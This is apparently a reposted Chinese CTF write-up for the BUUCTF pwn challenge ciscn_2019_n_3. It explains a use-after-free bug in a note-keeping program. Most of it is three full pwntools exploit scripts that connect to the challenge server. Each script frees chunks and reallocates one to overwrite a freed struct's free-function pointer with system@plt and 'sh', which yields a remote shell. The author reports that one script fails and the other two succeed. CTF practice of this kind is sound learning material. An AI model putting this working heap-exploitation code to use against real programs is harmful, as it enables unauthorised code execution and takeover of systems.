[BUUCTF-pwn]——ciscn_2019_n_3

x33g5p2x  于2021-11-20 转载在 其他  
字(3.3k)|赞(0)|评价(0)|浏览(239)

[BUUCTF-pwn]——ciscn_2019_n_3

  • 结构体:
//该结构体仅仅是选择字符串的时候的结构体
struct chunk
{
	void *rec_str_print();
    void *rec_str_free();
    char *str;
}

//该结构体仅仅是选择数字的时候的结构体
struct chunk
{
	void *rec_int_print();
    void *rec_int_free();
    int number;
}

这道题目就是简单的uaf漏洞利用,由于system已经给你了,所以连泄露地址都给你省了。很时候新手练习uaf。简单来说,就是通过堆漏洞将rec_int_free或者rec_str_free给需要为system。或者将rec_str_free给修改为system

一个不知道为什么不可以的payload, 感觉良好觉得非常可以,但是就是不行。希望有大神可以解惑一下啊

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,length,content):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('2')
	p.recvuntil("Length > ")
	p.sendline(str(length))
	p.recvuntil("Value > ")
	p.sendline(content)
def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,0x40,'aaaa')
new(1,0x30,'bbbb')

delete(0)
delete(1)
payload = flat([b'aaaa',elf.plt['system']])  #看了一下网上其他人的教程将aaaa改为bash就可以了。虽然我也不知道为什么。
new(2,0xc,payload)
new(3,0x40,b'/bin/sh\x00')
delete(0)
p.interactive()

exploit

通过Integer进行利用

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,number):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('1')
	p.recvuntil("Value > ")
	p.sendline(str(number))

	

def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,2)
new(1,2)
new(2,2)
delete(0)
delete(1)

payload = flat([b'sh\x00\x00',elf.plt['system']])

p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline('3')
p.recvuntil("Type > ")
p.sendline('2')
p.recvuntil("Length > ")
p.sendline(str(0xc))
p.recvuntil("Value > ")
p.sendline(payload)

delete(0)
p.interactive()

这个是可以利用成功的, 搞不明白为什么将’bin/sh’写入 0 的 string里面就不可以,通过text进行利用。和上面第一个不可以的exp明明是一个思路。搞不明白。

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,length,content):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('2')
	p.recvuntil("Length > ")
	p.sendline(str(length))
	p.recvuntil("Value > ")
	p.sendline(content)
def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,0x30,'aaaa')
new(1,0x30,'bbbb')

delete(0)
delete(1)
payload = flat([b'sh\x00\x00',elf.plt['system']])
new(3,0xc,payload)

delete(0)
p.interactive()

相关文章